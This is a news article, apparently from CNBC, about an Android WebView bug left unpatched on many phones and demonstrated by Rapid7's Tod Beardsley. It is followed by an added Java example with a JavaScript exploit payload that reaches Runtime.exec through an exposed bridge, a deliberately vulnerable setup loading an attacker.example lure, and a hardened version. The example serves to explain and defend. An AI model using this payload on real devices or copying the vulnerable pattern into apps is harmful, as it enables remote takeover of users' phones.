You might think buying a new phone from your mobile service provider means the latest model comes with updated software, guarding against potential cyberattacks. Well, you'd be wrong.
Android phones are the most popular smartphones in the world, with more than 78 percent market share, according to IDC's Worldwide Quarterly Mobile Phone Tracker.
The number of Android smartphone users worldwide is estimated to have reached 1.16 billion in 2013, according to Ramon Llamas, IDC's mobile phone research manager.
Tod Beardsley, an ethical hacker and engineering manager at Rapid7, a cybersecurity firm, estimates that about 70 percent of Android phones in use today still contain a bug uncovered by security researchers more than two years ago, leaving them vulnerable to cyberattacks. The bug was publicly disclosed about 16 months ago, but outdated versions of the software still run on some smartphones, Beardsley said.
An ethical hacker, sometimes referred to as a "white hat" hacker, investigates software and hardware vulnerabilities with the main goal of fixing those flaws to prevent future cyberattacks. "Black hat" hackers, in contrast, are the bad guys, and intentionally exploit vulnerabilities for financial or other personal gain.
The vulnerability affects Android operating system versions between 4.0 and 4.2, said Joshua Drake, lead author of the "Android Hacker's Handbook."
Although Google implemented a fix, there is still a lag before consumers receive updates for their mobile devices, Beardsley said. Google declined emailed requests for comment on the vulnerability.
Security researchers told CNBC this is a common problem with the Android OS because of the open-source nature of the Android platform: with each manufacturer shipping its own build, tracking updates and quality control are a challenge.
"Different manufacturers have the freedom to have their own version and flavor of the Android OS they use, therefore there is no enforcement or centralized control around patch management for releasing new updates," said Nima Dezhkam, principal consultant for Security Compass, an information security firm.
Beardsley recently demonstrated the attack for CNBC on a new, out-of-the-box HTC smartphone using AT&T service. His goal in demonstrating the attack, Beardsley said, is to put more pressure on manufacturers and mobile phone service providers to give consumers upgrades to the latest patched software.
Playing both the attacker, with a laptop computer, and the victim, with the HTC smartphone, for our cameras, Beardsley showed how this vulnerability can be exploited. He first set up a fake "evil" website to lure victims.
Baiting victims through email, social media or by displaying a Quick Response (QR) code that looks like a barcode, an attacker can lure the victim to the malicious website. One click on the link by the user, and Beardsley could seize control by exploiting the Android WebView vulnerability.
Beardsley demonstrated this by scanning the QR code. An alert immediately sounded on the laptop, and a message appeared that said, "Command shell session 8 opened…," allowing him to type commands that the victim's phone would now obey.
Beardsley then accessed the photos in the phone's gallery, and that's not all: he could also plant photos that might be compromising to the victim.
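The article does not name the bug or show what the attacker's page does. What follows is an added example written for this page, not code from CNBC, Rapid7 or HTC. It assumes the flaw is the WebView addJavascriptInterface reflection issue (CVE-2012-6636), which matches the details above: a page script can reach Java objects an app exposes to its WebView, Google's fix arrived in Android 4.2 (API 17), and a phone running an older build stays exposed until it is updated. The class, method and host names below are placeholders.

```java
// Added example, not from the article: the Android WebView bridge pattern behind
// the attack described above, assumed to be CVE-2012-6636 (addJavascriptInterface).
// Class, method and host names are illustrative placeholders.
import android.annotation.SuppressLint;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

public class WebViewBridgeExample {

    // A harmless-looking object an app might expose to page scripts.
    public static class HostBridge {
        // On API 17+ only annotated methods are reachable from JavaScript; on
        // Android 4.1 and earlier the annotation is not enforced at all.
        @JavascriptInterface
        public String appVersion() {
            return "1.0";
        }
    }

    // The script an attacker's page can run against a vulnerable WebView: the
    // public getClass() method is exposed along with everything else, so the
    // page walks from the bridge object to java.lang.Runtime and runs a command.
    // This is the classic public payload shape; the command here is just 'id'.
    public static final String ATTACKER_PAGE_SCRIPT =
          "bridge.getClass().forName('java.lang.Runtime')"
        + "  .getMethod('getRuntime', null).invoke(null, null)"
        + "  .exec(['/system/bin/sh', '-c', 'id']);";

    // VULNERABLE: every public method of HostBridge is callable by any page the
    // WebView loads when the device runs Android 4.1 or earlier, or when the app
    // targets an SDK below 17, regardless of the annotation.
    @SuppressLint({"SetJavaScriptEnabled", "AddJavascriptInterface"})
    public static void vulnerableSetup(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new HostBridge(), "bridge");
        webView.loadUrl("http://attacker.example/lure");   // placeholder lure URL
    }

    // HARDENED: the app must target API 17+ (android:targetSdkVersion in the
    // manifest) so the annotation is enforced, the bridge is only attached on a
    // device that enforces it and only for first-party content, and it is
    // removed otherwise. Phones that have not received the 4.2 update still get
    // no bridge at all, which is the only safe option on an unpatched build.
    @SuppressLint("SetJavaScriptEnabled")
    public static void hardenedSetup(WebView webView, boolean pageIsFirstParty) {
        webView.getSettings().setJavaScriptEnabled(true);
        boolean deviceEnforcesAnnotation = Build.VERSION.SDK_INT >= 17; // Android 4.2
        if (pageIsFirstParty && deviceEnforcesAnnotation) {
            webView.addJavascriptInterface(new HostBridge(), "bridge");
        } else {
            webView.removeJavascriptInterface("bridge");   // available since API 11
        }
        webView.loadUrl("https://app.example/");           // placeholder first-party URL
    }
}
```

The check a practitioner would want here is the device side of the same condition: a phone reporting an SDK level below 17 (Android 4.2) has not received the fix, and any app on it that attaches a JavaScript bridge to a WebView that can load third-party content is reachable by the kind of page Beardsley demonstrated. The hardened version assumes the manifest targets API 17 or higher; without that, the annotation alone does nothing.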
Smartphone maker HTC did not respond to email requests seeking comment on the Android WebView vulnerability.